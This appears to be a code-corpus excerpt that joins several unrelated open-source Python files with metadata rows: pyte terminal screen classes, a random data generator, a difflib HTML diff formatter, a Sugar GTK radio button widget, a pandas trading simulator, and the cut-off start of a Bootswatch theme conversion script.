class HistoryScreen(Screen):
"""A :class:~`pyte.screens.Screen` subclass, which keeps track
of screen history and allows pagination. This is not linux-specific,
but still useful; see page 462 of VT520 User's Manual.
:param int history: total number of history lines to keep; is split
between top and bottom queues.
:param int ratio: defines how much lines to scroll on :meth:`next_page`
and :meth:`prev_page` calls.
.. attribute:: history
A pair of history queues for top and bottom margins accordingly;
here's the overall screen structure::
[ 1: .......]
[ 2: .......] <- top history
[ 3: .......]
------------
[ 4: .......] s
[ 5: .......] c
[ 6: .......] r
[ 7: .......] e
[ 8: .......] e
[ 9: .......] n
------------
[10: .......]
[11: .......] <- bottom history
[12: .......]
.. note::
Don't forget to update :class:`~pyte.streams.Stream` class with
appropriate escape sequences -- you can use any, since pagination
protocol is not standardized, for example::
Stream.escape["N"] = "next_page"
Stream.escape["P"] = "prev_page"
"""
_wrapped = set(Stream.events)
_wrapped.update(["next_page", "prev_page"])
def __init__(self, columns, lines, history=100, ratio=.5):
self.history = History(deque(maxlen=history),
deque(maxlen=history),
float(ratio),
history,
history)
super(HistoryScreen, self).__init__(columns, lines)
def _make_wrapper(self, event, handler):
def inner(*args, **kwargs):
self.before_event(event)
result = handler(*args, **kwargs)
self.after_event(event)
return result
return inner
def __getattribute__(self, attr):
value = super(HistoryScreen, self).__getattribute__(attr)
if attr in HistoryScreen._wrapped:
return HistoryScreen._make_wrapper(self, attr, value)
else:
return value
def before_event(self, event):
"""Ensure a screen is at the bottom of the history buffer.
:param str event: event name, for example ``"linefeed"``.
"""
if event not in ["prev_page", "next_page"]:
while self.history.position < self.history.size:
self.next_page()
def after_event(self, event):
"""Ensure all lines on a screen have proper width (:attr:`columns`).
Extra characters are truncated, missing characters are filled
with whitespace.
:param str event: event name, for example ``"linefeed"``.
"""
if event in ["prev_page", "next_page"]:
for line in self.buffer.values():
for x in line:
if x > self.columns:
line.pop(x)
# If we're at the bottom of the history buffer and `DECTCEM`
# mode is set -- show the cursor.
self.cursor.hidden = not (
self.history.position == self.history.size and
mo.DECTCEM in self.mode
)
def _reset_history(self):
self.history.top.clear()
self.history.bottom.clear()
self.history = self.history._replace(position=self.history.size)
def reset(self):
"""Overloaded to reset screen history state: history position
is reset to bottom of both queues; queues themselves are
emptied.
"""
super(HistoryScreen, self).reset()
self._reset_history()
def erase_in_display(self, how=0):
"""Overloaded to reset history state."""
super(HistoryScreen, self).erase_in_display(how)
if how == 3:
self._reset_history()
def index(self):
"""Overloaded to update top history with the removed lines."""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == bottom:
self.history.top.append(self.buffer[top])
super(HistoryScreen, self).index()
def reverse_index(self):
"""Overloaded to update bottom history with the removed lines."""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == top:
self.history.bottom.append(self.buffer[bottom])
super(HistoryScreen, self).reverse_index()
def prev_page(self):
"""Move the screen page up through the history buffer. Page
size is defined by ``history.ratio``, so for instance
``ratio = .5`` means that half the screen is restored from
history on page switch.
"""
if self.history.position > self.lines and self.history.top:
mid = min(len(self.history.top),
int(math.ceil(self.lines * self.history.ratio)))
self.history.bottom.extendleft(
self.buffer[y]
for y in range(self.lines - 1, self.lines - mid - 1, -1))
self.history = self.history \
._replace(position=self.history.position - mid)
for y in range(self.lines - 1, mid - 1, -1):
self.buffer[y] = self.buffer[y - mid]
for y in range(mid - 1, -1, -1):
self.buffer[y] = self.history.top.pop()
self.dirty = set(range(self.lines))
def next_page(self):
"""Move the screen page down through the history buffer."""
if self.history.position < self.history.size and self.history.bottom:
mid = min(len(self.history.bottom),
int(math.ceil(self.lines * self.history.ratio)))
self.history.top.extend(self.buffer[y] for y in range(mid))
self.history = self.history \
._replace(position=self.history.position + mid)
for y in range(self.lines - mid):
self.buffer[y] = self.buffer[y + mid]
for y in range(self.lines - mid, self.lines):
self.buffer[y] = self.history.bottom.popleft()
self.dirty = set(range(self.lines))
class DebugEvent(namedtuple("Event", "name args kwargs")):
"""Event dispatched to :class:`~pyte.screens.DebugScreen`.
.. warning::
This is developer API with no backward compatibility guarantees.
Use at your own risk!
"""
@staticmethod
def from_string(line):
return DebugEvent(*json.loads(line))
def __str__(self):
return json.dumps(self)
def __call__(self, screen):
"""Execute this event on a given ``screen``."""
return getattr(screen, self.name)(*self.args, **self.kwargs)
class DebugScreen(object):
r"""A screen which dumps a subset of the received events to a file.
>>> import io
>>> with io.StringIO() as buf:
... stream = Stream(DebugScreen(to=buf))
... stream.feed("\x1b[1;24r\x1b[4l\x1b[24;1H\x1b[0;10m")
... print(buf.getvalue())
...
... # doctest: +NORMALIZE_WHITESPACE
["set_margins", [1, 24], {}]
["reset_mode", [4], {}]
["cursor_position", [24, 1], {}]
["select_graphic_rendition", [0, 10], {}]
:param file to: a file-like object to write debug information to.
:param list only: a list of events you want to debug (empty by
default, which means -- debug all events).
.. warning::
This is developer API with no backward compatibility guarantees.
Use at your own risk!
"""
def __init__(self, to=sys.stderr, only=()):
self.to = to
self.only = only
def only_wrapper(self, attr):
def wrapper(*args, **kwargs):
self.to.write(str(DebugEvent(attr, args, kwargs)))
self.to.write(str(os.linesep))
return wrapper
def __getattribute__(self, attr):
if attr not in Stream.events:
return super(DebugScreen, self).__getattribute__(attr)
elif not self.only or attr in self.only:
return self.only_wrapper(attr)
else:
return lambda *args, **kwargs: None
| mit | 3,143,114,599,980,431,000 | 34.434091 | 79 | 0.564834 | false | 4.160559 | false | false | false |
suraj-jayakumar/lstm-rnn-ad | src/testdata/random_data_time_series/generate_data.py | 1 | 1042 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 23 11:15:12 2016
@author: suraj
"""
import random
import numpy as np
import pickle
import matplotlib.pyplot as plt
attachRateList = []
for i in range(3360):
attachRateList.append(random.uniform(4,6))
attachRateList = np.array(attachRateList)
encoded_attach_rate_list = np.fft.fft(attachRateList)
day_number_list = [i%7 for i in range(3360)]
encoded_day_number_list = np.fft.fft(day_number_list)
time_number_list = [i%96 for i in range(3360)]
encoded_time_number_list = np.fft.fft(time_number_list)
final_list_x = np.array([[encoded_day_number_list.real[i],encoded_day_number_list.imag[i],encoded_time_number_list.real[i],encoded_time_number_list.imag[i],encoded_attach_rate_list.real[i],encoded_attach_rate_list.imag[i]] for i in range(3360)])
final_list_y = [ (encoded_attach_rate_list[i].real,encoded_attach_rate_list[i].imag) for i in range(len(encoded_attach_rate_list)) ]
pickle.dump(final_list_x,open('x_att.p','wb'))
pickle.dump(final_list_y,open('y_att.p','wb'))
| apache-2.0 | -7,580,691,378,354,332,000 | 23.809524 | 245 | 0.716891 | false | 2.713542 | false | false | false |
kalyptorisk/daversy | src/daversy/difflib_ext.py | 1 | 8527 | import re, difflib
def merge_group(list, func, start=True, end=True):
l, r, s = list[0]
first = ['',' class="first"'][start]
last = ['',' class="last"'][end]
if len(list) == 1:
if start and end:
return LINE_FORMAT % func(' class="first last"', l, r)
else:
return LINE_FORMAT % func(first+last, l, r)
html = LINE_FORMAT % func(first, l, r)
for i in range(1, len(list)-1):
l, r, s = list[i]
html += LINE_FORMAT % func('', l, r)
l, r, s = list[-1]
html += LINE_FORMAT % func(last, l, r)
return html
def make_table(table_id, header, fromlines, tolines, context=None, versions=['old', 'new']):
diff = list(difflib._mdiff(fromlines, tolines, context))
if not diff:
return None
same = lambda c, l, r: (c, l[0], r[0], 'l', format_line(l[1]))
add = lambda c, l, r: (c, '', r[0], 'r', format_line(r[1]))
sub = lambda c, l, r: (c, l[0], '', 'l', format_line(l[1]))
html = TABLE_HEADER % tuple([table_id, header] + versions)
for type, start, end in group_types(diff):
if type == 'same':
html += '<tbody>%s</tbody>\n' % \
merge_group(diff[start:end], same)
elif type == 'add':
html += '<tbody class="add">%s</tbody>\n' % \
merge_group(diff[start:end], add)
elif type == 'del':
html += '<tbody class="rem">%s</tbody>\n' % \
merge_group(diff[start:end], sub)
elif type == 'mod':
html += '<tbody class="mod">%s%s</tbody>\n' % \
(merge_group(diff[start:end], sub, end=False),
merge_group(diff[start:end], add, start=False))
elif type == 'skipped':
html += '<tbody class="skipped"><tr><th>...</th><th>...</th><td> </td></tr></tbody>\n'
html += TABLE_FOOTER
return html
def get_type(left, right, status):
if not status:
if left or right:
return 'same'
else:
return 'skipped'
l_num, l_line = left
r_num, r_line = right
if l_num and not r_num:
return 'del'
elif r_num and not l_num:
return 'add'
else:
return 'mod'
def group_types(diff):
items = [get_type(l,r,s) for l,r,s in diff]
group = []
if not items:
print diff
start, current = 0, items[0]
for i in range(1, len(diff)):
if items[i] != current:
group.append( (current, start, i) )
current = items[i]
start = i
group.append( (current, start, len(diff)) )
return group
REPLACE_CHARS = [
('&', '&'),
('<', '<'),
('>', '>'),
(' ', ' '),
('"', '"'),
('\0+', '<span class="ins">'),
('\0-', '<span class="del">'),
('\0^', '<span class="chg">'),
('\1', '</span>')
]
SINGLE_CHANGE = re.compile("^\0[\+\-\^]([^\0]+)\1\n?$")
def format_line(text):
text = text.replace('\n', '')
match = SINGLE_CHANGE.match(text)
if match:
text = match.group(1)
for src, replace in REPLACE_CHARS:
text = text.replace(src, replace)
return text
## the majority of the CSS and markup has been used from Trac
TABLE_HEADER = """
<li class='entry' id='%s'>
<h2>%s</h2>
<table class="inline" summary="Differences" cellspacing="0">
<colgroup><col class="lineno" /><col class="lineno" /><col class="content" /></colgroup>
<thead><th>%s</th><th>%s</th><th> </th></thead>
"""
TABLE_FOOTER = """
</table>
</li>
"""
LINE_FORMAT = "<tr%s><th>%s</th><th>%s</th><td class='%s'><span>%s</span> </td></tr>"
HTML_HEADER = """
<html><head><style type='text/css'>
/* Diff preferences */
#prefs fieldset { margin: 1em .5em .5em; padding: .5em 1em 0 }
/* Diff/change overview */
#overview {
line-height: 130%;
margin-top: 1em;
padding: .5em;
}
#overview dt {
font-weight: bold;
padding-right: .25em;
position: absolute;
left: 0;
text-align: right;
width: 7.75em;
}
#overview dd { margin-left: 8em }
/* Colors for change types */
#chglist .edit, #overview .mod, .diff #legend .mod { background: #fd8 }
#chglist .delete, #overview .rem, .diff #legend .rem { background: #f88 }
#chglist .add, #overview .add, .diff #legend .add { background: #bfb }
#chglist .copy, #overview .cp, .diff #legend .cp { background: #88f }
#chglist .move, #overview .mv, .diff #legend .mv { background: #ccc }
#chglist .unknown { background: #fff }
/* Legend for diff colors */
.diff #legend {
float: left;
font-size: 9px;
line-height: 1em;
margin: 1em 0;
padding: .5em;
}
.diff #legend h3 { display: none; }
.diff #legend dt {
background: #fff;
border: 1px solid #999;
float: left;
margin: .1em .5em .1em 2em;
overflow: hidden;
width: .8em; height: .8em;
}
.diff #legend dl, .diff #legend dd {
display: inline;
float: left;
padding: 0;
margin: 0;
margin-right: .5em;
}
/* Styles for the list of diffs */
.diff ul.entries { clear: both; margin: 0; padding: 0 }
.diff li.entry {
background: #f7f7f7;
border: 1px solid #d7d7d7;
list-style-type: none;
margin: 0 0 2em;
padding: 2px;
position: relative;
}
.diff h2 {
color: #333;
font-size: 14px;
letter-spacing: normal;
margin: 0 auto;
padding: .1em 0 .25em .5em;
}
/* Styles for the actual diff tables (side-by-side and inline) */
.diff table {
border: 1px solid #ddd;
border-spacing: 0;
border-top: 0;
empty-cells: show;
font-size: 12px;
line-height: 130%;
padding: 0;
margin: 0 auto;
width: 100%;
}
.diff table col.lineno { width: 4em }
.diff table th {
border-right: 1px solid #d7d7d7;
border-bottom: 1px solid #998;
font-size: 11px;
}
.diff table thead th {
background: #eee;
border-top: 1px solid #d7d7d7;
color: #999;
padding: 0 .25em;
text-align: center;
white-space: nowrap;
}
.diff table tbody th {
background: #eed;
color: #886;
font-weight: normal;
padding: 0 .5em;
text-align: right;
vertical-align: top;
}
.diff table tbody td {
background: #fff;
font: normal 11px monospace;
overflow: hidden;
padding: 1px 2px;
vertical-align: top;
}
.diff table tbody.skipped td {
background: #f7f7f7;
border: 1px solid #d7d7d7;
}
.diff table td span.del, .diff table td span.ins { text-decoration: none }
.diff table td span.del { color: #600 }
.diff table td span.ins { color: #060 }
/* Styles for the inline diff */
.diff table.inline tbody.mod td.l, .diff table.inline tbody.rem td.l {
background: #fdd;
border-color: #c00;
border-style: solid;
border-width: 0 1px 0 1px;
}
.diff table.inline tbody.mod td.r, .diff table.inline tbody.add td.r {
background: #dfd;
border-color: #0a0;
border-style: solid;
border-width: 0 1px 0 1px;
}
.diff table.inline tbody.mod tr.first td.l,
.diff table.inline tbody.rem tr.first td.l { border-top-width: 1px }
.diff table.inline tbody.mod tr.last td.l,
.diff table.inline tbody.rem tr.last td.l { border-bottom-width: 1px }
.diff table.inline tbody.mod tr.first td.r,
.diff table.inline tbody.add tr.first td.r { border-top-width: 1px }
.diff table.inline tbody.mod tr.last td.r,
.diff table.inline tbody.add tr.last td.r { border-bottom-width: 1px }
.diff table.inline tbody.mod td span.del { background: #e99; color: #000 }
.diff table.inline tbody.mod td span.ins { background: #9e9; color: #000 }
.diff table.inline tbody.mod td span.chg { background: #ee9; color: #000 }
/* Styles for the side-by-side diff */
.diff table.sidebyside colgroup.content { width: 50% }
.diff table.sidebyside tbody.mod td.l { background: #fe9 }
.diff table.sidebyside tbody.mod td.r { background: #fd8 }
.diff table.sidebyside tbody.add td.l { background: #dfd }
.diff table.sidebyside tbody.add td.r { background: #cfc }
.diff table.sidebyside tbody.rem td.l { background: #f88 }
.diff table.sidebyside tbody.rem td.r { background: #faa }
.diff table.sidebyside tbody.mod span.del, .diff table.sidebyside tbody.mod span.ins, .diff table.sidebyside tbody.mod span.chg {
background: #fc0;
}
/* Changeset overview */
#overview .files { padding-top: 2em }
#overview .files ul { margin: 0; padding: 0 }
#overview .files li { list-style-type: none }
#overview .files li .comment { display: none }
#overview .files li div {
border: 1px solid #999;
float: left;
margin: .2em .5em 0 0;
overflow: hidden;
width: .8em; height: .8em;
}
#overview div.add div, #overview div.cp div, #overview div.mv div {
border: 0;
margin: 0;
float: right;
width: .35em;
}
span.ver {font: normal 11px monospace;}
</style></head><body>
"""
HTML_FOOTER = """
</body>
</html>
"""
| gpl-2.0 | -9,172,895,471,794,657,000 | 26.156051 | 129 | 0.606661 | false | 2.854704 | false | false | false |
sugarlabs/sugar-toolkit-gtk3 | src/sugar3/graphics/radiotoolbutton.py | 1 | 7756 | # Copyright (C) 2007, Red Hat, Inc.
# Copyright (C) 2007-2008, One Laptop Per Child
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
'''
Provides a RadioToolButton class, similar to a "push" button.
A group of RadioToolButtons can be set, so that only one can be
selected at a time. When a button is clicked, it depresses and
is shaded darker.
It is also possible to set a tooltip to be dispalyed when the
user scrolls over it with their cursor as well as an accelerator
keyboard shortcut.
Example:
.. literalinclude:: ../examples/radiotoolbutton.py
'''
from gi.repository import Gtk
from gi.repository import GObject
from sugar3.graphics.icon import Icon
from sugar3.graphics.palette import Palette, ToolInvoker
from sugar3.graphics import toolbutton
class RadioToolButton(Gtk.RadioToolButton):
'''
The RadioToolButton class manages a Gtk.RadioToolButton styled for
Sugar.
Args:
icon_name (string): name of icon to be used.
Keyword Args:
accelerator (string): keyboard shortcut to be used to
activate this button.
tooltip (string): tooltip to be displayed when user hovers
over button.
xo_color (sugar3.graphics.xocolor.XoColor): XoColor of button.
hide_tooltip_on_click (bool): Whether or not the tooltip
is hidden when user clicks on button.
'''
__gtype_name__ = 'SugarRadioToolButton'
def __init__(self, icon_name=None, **kwargs):
self._accelerator = None
self._tooltip = None
self._xo_color = None
self._hide_tooltip_on_click = True
self._palette_invoker = ToolInvoker()
GObject.GObject.__init__(self, **kwargs)
self._palette_invoker.attach_tool(self)
if icon_name:
self.set_icon_name(icon_name)
# HACK: stop Gtk from adding a label and expanding the size of
# the button. This happen when set_icon_widget is called
# if label_widget is None
self.props.label_widget = Gtk.Box()
self.connect('destroy', self.__destroy_cb)
def __destroy_cb(self, icon):
if self._palette_invoker is not None:
self._palette_invoker.detach()
def set_tooltip(self, tooltip):
'''
Set the tooltip.
Args:
tooltip (string): tooltip to be set.
'''
if self.palette is None or self._tooltip is None:
self.palette = Palette(tooltip)
elif self.palette is not None:
self.palette.set_primary_text(tooltip)
self._tooltip = tooltip
# Set label, shows up when toolbar overflows
Gtk.RadioToolButton.set_label(self, tooltip)
def get_tooltip(self):
'''
Return the tooltip.
'''
return self._tooltip
tooltip = GObject.Property(type=str, setter=set_tooltip,
getter=get_tooltip)
def set_accelerator(self, accelerator):
'''
Set keyboard shortcut that activates this button.
Args:
accelerator (string): accelerator to be set. Should be in
form <modifier>Letter.
'''
self._accelerator = accelerator
toolbutton.setup_accelerator(self)
def get_accelerator(self):
'''
Return accelerator string.
'''
return self._accelerator
accelerator = GObject.Property(type=str, setter=set_accelerator,
getter=get_accelerator)
def set_icon_name(self, icon_name):
'''
Set name of icon.
Args:
icon_name (string): name of icon
'''
icon = Icon(icon_name=icon_name,
xo_color=self._xo_color)
self.set_icon_widget(icon)
icon.show()
def get_icon_name(self):
'''
Return icon name, or None if there is no icon name.
'''
if self.props.icon_widget is not None:
return self.props.icon_widget.props.icon_name
else:
return None
icon_name = GObject.Property(type=str, setter=set_icon_name,
getter=get_icon_name)
def set_xo_color(self, xo_color):
'''
Set XoColor of button icon.
Args:
xo_color (sugar3.graphics.xocolor.XoColor): xocolor to be set.
'''
if self._xo_color != xo_color:
self._xo_color = xo_color
if self.props.icon_widget is not None:
self.props.icon_widget.props.xo_color = xo_color
def get_xo_color(self):
'''
Return xocolor.
'''
return self._xo_color
xo_color = GObject.Property(type=object, setter=set_xo_color,
getter=get_xo_color)
def create_palette(self):
return None
def get_palette(self):
return self._palette_invoker.palette
def set_palette(self, palette):
self._palette_invoker.palette = palette
palette = GObject.Property(
type=object, setter=set_palette, getter=get_palette)
def get_palette_invoker(self):
return self._palette_invoker
def set_palette_invoker(self, palette_invoker):
self._palette_invoker.detach()
self._palette_invoker = palette_invoker
palette_invoker = GObject.Property(
type=object, setter=set_palette_invoker, getter=get_palette_invoker)
def do_draw(self, cr):
'''
Implementation method for drawing the button.
'''
if self.palette and self.palette.is_up():
allocation = self.get_allocation()
# draw a black background, has been done by the engine before
cr.set_source_rgb(0, 0, 0)
cr.rectangle(0, 0, allocation.width, allocation.height)
cr.paint()
Gtk.RadioToolButton.do_draw(self, cr)
if self.palette and self.palette.is_up():
invoker = self.palette.props.invoker
invoker.draw_rectangle(cr, self.palette)
return False
def get_hide_tooltip_on_click(self):
'''
Return True if the tooltip is hidden when a user
clicks on the button, otherwise return False.
'''
return self._hide_tooltip_on_click
def set_hide_tooltip_on_click(self, hide_tooltip_on_click):
'''
Set whether or not the tooltip is hidden when a user
clicks on the button.
Args:
hide_tooltip_on_click (bool): True if the tooltip is
hidden on click, and False otherwise.
'''
if self._hide_tooltip_on_click != hide_tooltip_on_click:
self._hide_tooltip_on_click = hide_tooltip_on_click
hide_tooltip_on_click = GObject.Property(
type=bool, default=True, getter=get_hide_tooltip_on_click,
setter=set_hide_tooltip_on_click)
def do_clicked(self):
'''
Implementation method for hiding the tooltip when
the button is clicked.
'''
if self._hide_tooltip_on_click and self.palette:
self.palette.popdown(True)
| lgpl-2.1 | 3,167,136,973,559,909,400 | 29.777778 | 76 | 0.618747 | false | 4.010341 | false | false | false |
hackthemarket/pystrat | sim.py | 1 | 10697 | # simple trading strategy simulator
import pandas as pd
from pandas.tools.plotting import autocorrelation_plot
from pandas.tools.plotting import scatter_matrix
import numpy as np
from scipy import stats
import sklearn
from sklearn import preprocessing as pp
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import interactive
interactive(True)
import sys
import time
import logging as log
log.basicConfig(level=log.DEBUG)
import glob
import os.path
import pickle
import logging as log
log.basicConfig(level=log.DEBUG)
import random
import pdb
pd.set_option('display.width',500)
# define constant friction function
DefaultBPS = 10
def FrictionInBps(U, cfg, kvargs):
""" default FrictionInBps function just returns default,
but the interface receives all strategy info after
strategy is run, so one can create more realistic
impact models """
return DefaultBPS
""" default simulator cfg dictionary.
default keys/values:
FrictionInBps - function that takes same args as strategy.
by default, returns DefaultBps.
InitBal - in $s
Reinvest - should we reinvest our winnings or constantly assume we have InitBal?
Verbose
"""
DEF_SIM_CFG= { 'FrictionInBps': FrictionInBps,
'Verbose' : True,
'InitBal' : 1e7,
'Reinvest' : True }
# columns in prepped univ
SIM_COLS = ["Sym","Product","Instrument",
"Multiplier","Expiry","Strike",
"Open","High","Low","Close","Volume"]
SIM_COLS_OUT = ["Prev_Weight", "Weight", "Prev_Qty", "Qty",
"Trade_Qty", "Trade_Fric", "PNL", "NET_PNL"]
SIM_COL_BALS =[ "NAV","Friction","PNL","NET_PNL", "Longs","Shorts",
"Long_Dlrs","Short_Dlrs","Num_Trades","Turnover","NET_Return"]
def squarem( df, sym='Sym', min_pct=.9 ) :
# sim_squarem solves the common problem in which you have a large table of
# data grouped by symbols, some of which have missing data. You want to
# 'square' the data such that any symbol which is missing 'too much' data
# is expunged and the remaining data is filled appropriately, leaving you
# with a dataset which has the same # of observations for each symbol.
#
bysyms = df.groupby(sym).size()
idx = df.index.unique()
onumsyms = len(bysyms)
minlen = int(round(len(idx) * .9 ))
keep = bysyms[bysyms > minlen]
u = df[ df[sym].isin(keep.index) ]
numsyms = len(keep)
log.info('Got rid of %d/%d symbols',(numsyms-onumsyms),onumsyms)
u.replace(0,np.nan,inplace=True)
u.replace([np.inf, -np.inf], np.nan,inplace=True)
u.sort_index(inplace=True)
uidx = u.index.unique()
# groupby and reindex magic
z = u.groupby(sym).apply(
lambda x: x.reindex(uidx).ffill()).reset_index(0,drop=True)
# badz = z[z.isnull().any(axis=1)]
# if len(badz.index) > 0 :
# badtimes = badz.index.unique().values
# z.drop( badtimes, inplace=True )
# for dt in badtimes:
# log.info('removed %s for NaNs',pd.to_datetime(str(dt)).strftime(
# '%Y-%m-%d'))
return z
def prep_univ( dateTime, symbol,
open, high, low, close, volume,
product, instrument='STK', multiplier=1.0,expiry=None,
strike=None,adv_days=20,sd_days=20, open2close_returns=True,
scaleAndCenter=False, **more_cols) :
# constructs universe appropriate for use with simulator; any additional columns
# passed-in via ellipsis will be added to table as named
#
U = pd.DataFrame({'Sym': symbol,
'Product' : product, 'Instrument':instrument,
'Multiplier': 1.0, 'Expiry': None, 'Strike':None,
'Open':open,'High':high, 'Low':low, 'Close':close,
'Volume':volume }, index=dateTime )
U = U[ SIM_COLS ]
if len(more_cols) > 0:
U = pd.concat( [U, pd.DataFrame(more_cols)], axis=1 )
U.reset_index( inplace=True)
U.sort_values(['Sym','Date'],inplace=True)
U.Date = pd.to_datetime(U.Date)
U.set_index('Date',inplace=True)
if scaleAndCenter :
log.debug('prep_univ: scaling & centering')
raw_scaled = U.groupby('Sym').transform(
lambda x : (x - x.mean())/x.std())
U = pd.concat([ u.Sym, raw_scaled], axis=1)
# calculate adv, returns, fwd_returns & change in volume
U['ADV'] = U.groupby('Sym')['Volume'].apply(
pd.rolling_mean, adv_days, 1).shift()
U['DeltaV'] = U.groupby('Sym')['Volume'].transform(
lambda x : np.log(x / x.shift()) )
U['Return'] = U.groupby('Sym')['Close'].transform(
lambda x : np.log(x / x.shift()) )
U['Fwd_Close'] = U.groupby('Sym')['Close'].shift(-1)
U['Fwd_Return'] = U.groupby('Sym')['Close'].transform(
lambda x : np.log(x / x.shift()).shift(-1) ) # fwd.returns
U['SD'] = U.groupby('Sym')['Return'].apply(
pd.rolling_std, sd_days, 1).shift()
if open2close_returns:
U['Fwd_Open'] = U.groupby('Sym')['Open'].shift(-1)
U['Fwd_COReturn'] = np.divide(np.add( U.Fwd_Open, -U.Close ),U.Close)
U.ffill(inplace=True)
U.sort_index(inplace=True)
return U
# simple, default strategy: equal weight universe on daily basis
def eq_wt( U, cfg, kvargs ) :
#pdb.set_trace()
U.Weight = 1/float(len(U.index))
return U
# given today's Universe U and Yesterday's Y, set U's
# Prev_Weight and Prev_Qty to Y's Weight & Qty
# TODO: clean-up
def _getprevs( U, Y ) :
# TODO: surely there's a cleaner way to do this...
wts = Y.reset_index()[['Sym','Weight']]
wts.columns = ['Sym','Prev_Weight']
pwts = U[['Sym']].merge( wts, on = 'Sym' )['Prev_Weight']
U.Prev_Weight=pwts.values
qts = Y.reset_index()[['Sym','Qty']]
qts.columns = ['Sym','Prev_Qty']
pqts = U[['Sym']].merge( qts, on = 'Sym' )['Prev_Qty']
U.Prev_Qty=pqts.values
# functor to run strategy each day and update tbls ...
# TODO: clean-up
def __sim ( U, FUN, cfg, B, kvargs) :
# run sim to set weights
U = FUN( U, cfg, kvargs)
# set prev values for weight & qty...
Y = kvargs.pop('_Y', None)
if Y is not None and not np.all(Y.index==U.index):
_getprevs(U,Y)
loop = 1 + int(kvargs.pop('_L'))
else:
loop = 0
kvargs['_L'] = loop
kvargs['_Y'] = U
bb = B.iloc[loop]
# fill-out trade details
NAV = bb.NAV
tospend = NAV/U.Weight
U.Qty = np.round((NAV*U.Weight) / (U.Multiplier*U.Close))
U.Trade_Qty = U.Qty - U.Prev_Qty
fbps = 1e-4 * cfg['FrictionInBps'](U,cfg,kvargs)
U.Trade_Fric = U.Trade_Qty * U.Close * U.Multiplier * fbps
U.PNL = (U.Fwd_Close - U.Close) * U.Qty * U.Multiplier
U.NET_PNL = U.PNL - U.Trade_Fric
# today's balances are based on yesterday's posns...
longs = U[U.Qty > 0]
shorts = U[U.Qty < 0]
trades = U[U.Trade_Qty != 0]
bb.Friction = U.Trade_Fric.sum()
bb.PNL = U.PNL.sum()
bb.NET_PNL = U.NET_PNL.sum()
bb.Longs = len(longs.index)
bb.Shorts = len(shorts.index)
bb.Long_Dlrs = (longs.Close * longs.Multiplier * longs.Qty).sum()
bb.Short_Dlrs = (shorts.Close * shorts.Multiplier * shorts.Qty).sum()
bb.Num_Trades = len(trades.index)
bb.Turnover = (trades.Close * trades.Multiplier
* trades.Trade_Qty.abs()).sum()/NAV
if loop > 0 :
yb = B.iloc[loop-1]
ynav = yb.NAV
tnav = ynav + yb.NET_PNL
bb.NAV = tnav
bb.NET_Return = (tnav-ynav)/ynav
B.iloc[loop] = bb
# pdb.set_trace()
return U
def sim( univ, sim_FUN=eq_wt, cfg=DEF_SIM_CFG.copy(), kvargs={} ) :
""" simulator: runs simulation and returns a table of activity and balances.
args:
univ - historical data that's been produced by prep_univ
sim_FUN - strategy function. by default, equal weights univ.
cfg - cfg info. by default
kvargs - strat-specific extra data in a dict
"""
#
t0 = time.time()
all_times = univ.index.unique().values
# prepare writable/output side of universe
W = pd.DataFrame( columns=SIM_COLS_OUT, index = univ.index).fillna(0.0)
U = pd.concat( [univ, W], axis=1 )
# create balances table: one per day
B = pd.DataFrame( columns = SIM_COL_BALS, index = all_times ).fillna(0.0)
B.NAV = cfg['InitBal']
# 'daily' loop
Z = U.groupby(U.index).apply( __sim, FUN=sim_FUN,
cfg=cfg, B=B, kvargs=kvargs )
log.info('ran over %d days and %d rows in %d secs', len(all_times),
len(U.index),time.time()-t0)
# summarize results a bit more...?
#ts=xts(B$Net.Return,order.by=B$DateTime)
# return universe and balances
#list(U=U,B=B, ts=ts)
return Z, B
def sharpe(Returns) :
return np.sqrt(252) * np.mean(Returns)/np.std(Returns)
def random_strat( U, cfg, kvargs ) :
# random portfolio strategy: picks 'num_names' randomly
nnames = kvargs.get('num_names',10)
names = random.sample(U.Sym, nnames )
U.Weight = np.where( U.Sym.isin( names ), 1/float(nnames), 0 )
return U
def best_strat( U, cfg, kvargs ) :
# portfolio strategy: picks 'num_names' based on trailing return
nnames = kvargs.get('num_names',10)
#pdb.set_trace()
best = U.sort_values('Return',ascending=False,
na_position='last')['Sym'].head(10).values
U.Weight = np.where( U.Sym.isin( best ), 1/float(nnames), 0 )
return U
def worst_strat( U, cfg, kvargs ) :
# portfolio strategy: picks 'num_names' based on trailing return
nnames = kvargs.get('num_names',10)
#pdb.set_trace()
worst = U.sort_values('Return',ascending=True,
na_position='last')['Sym'].head(10).values
U.Weight = np.where( U.Sym.isin( worst ), 1/float(nnames), 0 )
return U
def rtest(U,FUN=random_strat, runs=10):
# run given strat repeatedly, plotting NAVs and Returning them
# nb: this only makes sense if the strategy is random...
# run random_strat 'runs' times and plot NAVs
N = None
for i in range(runs) :
_,b = sim( U, sim_FUN=FUN )
n = pd.DataFrame(b.NAV)
N = n if N is None else pd.concat([N,n],axis=1)
N.plot(legend=False)
return N
def sim_test():
# dev driver
f = 'U.pkl'
P = pickle.load(open(f))
log.info('loaded <%s>',f)
P.describe()
U = P[P.index >= '2005-01-01']
U.describe()
import sim
_,B = sim.sim(U)
#plot NAV
B.NAV.plot(title='Equal Weight Everyone')
return B
| gpl-3.0 | 3,906,262,475,805,889,000 | 32.015432 | 84 | 0.597177 | false | 3.08894 | false | false | false |
douglaskastle/bootswatch | convert_bootswatch_mutara.py | 1 | 7972 | import re
import os
values = {
# 'uc': 'Grissom',
'lc': 'mutara',
'header': 'Michroma',
'body': 'Play',
'website': 'mavek_org',
# 'cl': '#116BB7',
}
def main():
src = 'cyborg'
cmd = 'cp -r {0}/* {1}'.format(src, values['lc'])
os.system(cmd)
infile = "{0}/bootswatch.less".format(src)
f = open(infile, 'r')
lines = f.readlines()
f.close()
outfile = values['lc'] + "/bootswatch.less"
f = open(outfile, 'w')
for line in lines:
line = re.sub(src.title(), values['lc'].title(), line)
